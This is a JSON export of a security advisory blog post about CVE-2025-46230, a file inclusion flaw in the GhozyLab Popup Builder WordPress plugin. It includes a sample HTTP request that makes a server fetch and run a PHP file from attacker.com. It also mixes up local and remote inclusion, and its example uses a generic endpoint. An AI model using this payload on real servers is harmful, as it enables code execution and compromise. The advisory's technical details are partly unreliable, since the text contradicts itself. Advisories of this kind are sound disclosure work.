{"id":86258,"date":"2026-01-11T11:26:20","date_gmt":"2026-01-11T11:26:20","guid":{"rendered":""},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-30T06:00:00","slug":"cve-2025-46230-php-remote-file-inclusion-vulnerability-in-ghozylab-popup-builder","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-46230-php-remote-file-inclusion-vulnerability-in-ghozylab-popup-builder\/","title":{"rendered":"<strong>CVE-2025-46230: PHP Remote File Inclusion Vulnerability in GhozyLab Popup Builder<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>The vulnerability CVE-2025-46230 pertains to the GhozyLab Popup Builder, wherein an improper control of filename for Include\/Require Statement in PHP program allows PHP Local File Inclusion. This vulnerability can lead to potential system compromise or data leakage, thereby affecting the integrity and confidentiality of the system. This issue is of high importance due to its impact on potentially numerous web applications powered by the PHP programming language.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-46230<br \/>\nSeverity: High, 7.5 (CVSS Score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: Low<br \/>\nUser Interaction: None<br \/>\nImpact: Potential system compromise or data leakage<\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-1951976369\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>GhozyLab Popup Builder | up to and including 1.1.35<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The exploit works by manipulating the filename in the Include\/Require Statement in a PHP program, which allows an attacker to include a local file from the server. This can be used to execute arbitrary PHP code, providing a pathway for potential system compromise or data leakage.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-4087402068\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Below is a conceptual example of how the vulnerability might be exploited. This is a sample HTTP request with a malicious payload.<\/p>\n<pre><code class=\"\" data-line=\"\">GET \/vulnerable_endpoint.php?file=http:\/\/attacker.com\/malicious_file.php HTTP\/1.1\nHost: target.example.com\nAccept: *\/*<\/code><\/pre>\n<p>In this example, the attacker could host a malicious PHP file on their own server (attacker.com) and then trick the vulnerable application into including and executing that code. This would allow the attacker to execute arbitrary code with the privileges of the web server process.<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>To mitigate the issue, users are advised to apply the vendor patch as soon as it becomes available. In the meantime, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can provide temporary mitigation. Additionally, users can restrict the input of the file parameter to only allow local resources to be included, and disallow any remote resources.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview The vulnerability CVE-2025-46230 pertains to the GhozyLab Popup Builder, wherein an improper control of filename for Include\/Require Statement in PHP program allows PHP Local File Inclusion. This vulnerability can lead to potential system compromise or data leakage, thereby affecting the integrity and confidentiality of the system. This issue is of high importance due to [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-86258","post","type-post","status-publish","format-standard","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/86258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=86258"}],"version-history":[{"count":0,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/86258\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=86258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=86258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=86258"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=86258"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=86258"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=86258"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=86258"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=86258"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=86258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}